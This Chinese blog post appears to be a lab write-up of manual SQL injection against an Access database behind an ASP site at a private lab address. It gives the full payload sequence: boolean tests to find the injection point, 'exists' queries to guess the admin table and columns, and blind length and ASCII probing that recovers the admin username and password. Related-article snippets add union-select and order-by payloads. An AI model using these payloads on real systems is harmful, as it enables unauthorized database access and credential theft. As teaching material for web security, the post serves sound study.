SQL注入原理-手工注入access数据库

最新推荐文章于 2022-11-10 03:00:00 发布
最新推荐文章于 2022-11-10 03:00:00 发布
阅读量606 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WQ_762/article/details/81451405
版权

SQL注入原理-手工注入access数据库

【实验原理】
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

首先,在以【.asp?id=32(数字任意)】结尾的链接依次添加语句【’】、【and 1=1】和【and1=2】,来判断网站是否存在注入点。
然后,添加语句【and exists(select * from admin)】,根据页面返回结果来猜解表名。

再次,添加语句【and exists(select admin from admin)】,来猜解admin表中的列名admin。

最后,添加语句【and (select top 1 len (admin) from admin)>1】,来猜解字段长度;添加【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,来猜解字段中字符的ASCII码。
通过以上四个步骤,反复猜解,即可得到数据库存储的用户名和密码。

【实验步骤】
一、找到有注入漏洞的目标网站
1.1目标站点:【http:// 192.168.1.3:8008】,随便选择一个链接【http://192.168.1.3:8008/onews.asp?id=45】。如图1所示
这里写图片描述

1.2测试链接,在链接末尾添加【’】。如图2所示
这里写图片描述
1.3在链接末尾添加【 and 1=1】。如图3所示
这里写图片描述
1.4在链接末尾添加【and 1=2】,返回页面显示该网站存在注入漏洞。如图4所示
这里写图片描述
二、猜解表名
2.1在链接末尾添加语句【and exists(select * from admin)】,页面正常显示,说明存在表名【admin】。如图5所示
这里写图片描述
三、猜解列名
3.1在连接末尾添加语句【and exists(select admin from admin)】,页面显示正常,即在表中存在admin列。如图6所示
这里写图片描述
3.2同样的方法,在链接末尾添加【and exists(select password from admin)】,页面显示正常,说明存在列password。如图7所示
这里写图片描述
四、猜测字段内容
4.1猜测字段的长度,在连接末尾输入语句【and (select top 1 len (admin) from admin)>1】,页面显示正常,数字依次加1,进行测试,如【and (select top 1 len (admin) from admin)>5】,说明字段长度为5。如图8所示这里写图片描述

4.2同样的方法,在链接末尾添加连接【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,可猜解出第一条记录的第一位字符的ASCII码为97,对应a。如图9所示
这里写图片描述

图9
4.3同样的方法可以得到admin字段内容为【admin】,password字段内容为【bfpms】。

WQ_762
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 943
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
sql注入原理--手工注入access数据库
zerrorLiu的博客
06-24 283
对象:.asp?id=12(任意数字)  结尾网站 1.判断是否存在注入点:分别依次在链接末尾加【’】【and 1=1】【and 1=2】并回车,如果只有第二次能正常显示网页,说明可以注入。 2.猜解表名:链接尾【and exists(select admin from admin)】若正常显示,说明存在admin列;                       同理,把第一个admin改成
SQL手工注入漏洞测试(Access数据库)
天天学安全专属博客
11-10 772
SQL手工注入漏洞测试(Access数据库)和Access数据库注入
#学习笔记#SQL注入原理——手工注入access数据库
cheese0.0的博客
07-30 1027
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面查询的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的 字符串来传递,也会发生sql注入SQL注入可以协助攻击者登录数据库执行命令,有些会使账户获得更高的权限对数据库进行操...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
SQL注入Access注入手工
12-14
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 ...手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍,涵盖了注入原理、实战心得、判断数据库类型、常用内置函数使用、数据库的扩展存储过程等方面的内容。
SQL手工注入教程最新版
09-18
SQL注入原理在于,攻击者通过在URL参数或其他用户输入点插入SQL命令,使得原本合法的查询语句变得恶意。例如,如果一个URL中的`id`参数用于直接构建SQL查询,如`SELECT * FROM table WHERE id = '49'`,攻击者可以...
Access数据库手工注入全攻略——小白必看
07-18
总之,Access数据库手工注入是一个复杂的过程,涉及到SQL语句的构造和测试。对于新手来说,理解和实践这些技巧有助于提升安全意识,防止网站遭受注入攻击。同时,对源代码的审查和字符过滤也是防范此类攻击的重要...
全程图解手工注入SQL注入
06-25
因为本网站可以显示错误,根据SQLServer数据库的特点,...如果不能显示错误,可以用猜测和折半法相结合的方式,得到这些信息,这种方法在Access数据库注入过程中已经体现,下文用附加特殊语句的方式来得到这些信息。
mssql,access,mysql手工注入详解
10-18
本文将深入探讨针对Microsoft SQL Server(MSSQL)、Access和MySQL数据库手工注入技术,帮助你理解其工作原理,防范潜在风险。 1. **MSSQL数据库注入** MSSQL注入通常发生在应用程序未能充分验证用户输入时。...
手工注入基础
11-11
`,如果页面返回异常,可能是Access数据库;若无异常,可能是MS SQL Server。还可以使用特定的SQL语句,例如`';and (select count(*) from sysobjects)>0`或`';and (select count(*) from msysobjects)>0`来进一步...
明小子注入工具
08-20
2. **SetData.mdb**:这是一个Microsoft Access数据库文件,可能包含了明小子的配置数据、内置的测试用例、或者用户自定义的注入脚本等信息。这类文件通常用于存储程序内部的数据和设置。 3. **skins**:这个文件夹...
高级Web渗透测试工程师-Mysql注入教程.pdf
11-25
Mysql后台手工注入及绕过是指攻击者可以通过构造特殊的SQL语句来访问或修改数据库中的数据,并且可以绕过一些安全机制。 PHP的魔术引号与宽字节注入 PHP的魔术引号与宽字节注入是指攻击者可以通过构造特殊的SQL语句...
手工注入
LYSM
05-08 2149
** 判断是否存在注入 ** 1 1' and 1=1;# 如果返回结果相同则可能存在注入,再次比较—— 1' and 1=1;# 1' and 1=2;# 结果不同,则基本可以确定存在注入。 猜测表中的列数 1' order by 1;# 1' order by 2;# 1' order by 3;# ... ... 直到报错为止,order by 后的值就是列数。 拼接语句 union ...
手工注入原理
weixin_40709439的博客
07-31 631
 之前虽然经常使用过一些注入语句,但只是得到结果,不得其深意。这次专门去了解分析其原理,希望有所收获 查询遍历所有的数据库:(limit n,m)(n>=0,m>0) 1' and 1=2 union select 1,schema_name,3,num,num from information_schema.schemata limit 0,1#  查询当前数据库: 1'...
SQL手工注入access手工注入
The__DeepSea的博客
05-13 537
一、判断是否存在注入‘       页面返回错误,可能存在注入and 1=1  页面返回正确    and1=2 页面返回错误  可能存在注入二、判断数据库类型1.and (select count(*) from mysysobjects)>0  -返回权限不足 为access数据库2.and (select count(*) from sysobjects)>0  -但会正常为MS...
SQL注入之——ACCESS手工注入
温柔小薛的博客
04-04 697
ACCESS手工注入 目录ACCESS手工注入ACCESS手工注入(上)理论基础爆出数据库类型(需要低版本IE浏览器)猜数据库名猜字段名及字段长度猜字段值ACCESS手工注入(下)SQL 注入中的高级查询——order by 与 union selectunion select 查询攻击测试ACCESS手工偏移注入ACCESS手工跨库查询 ACCESS手工注入(上) Access数据库一般用于流量...
SQL注入漏洞-手工注入
最新发布
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员进行漏洞的修复和弥补。但是需要注意的是,在使用这些工具进行测试时,一定要严格遵守相关法律法规,不得滥用,以免造成不必要的损失和困扰。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值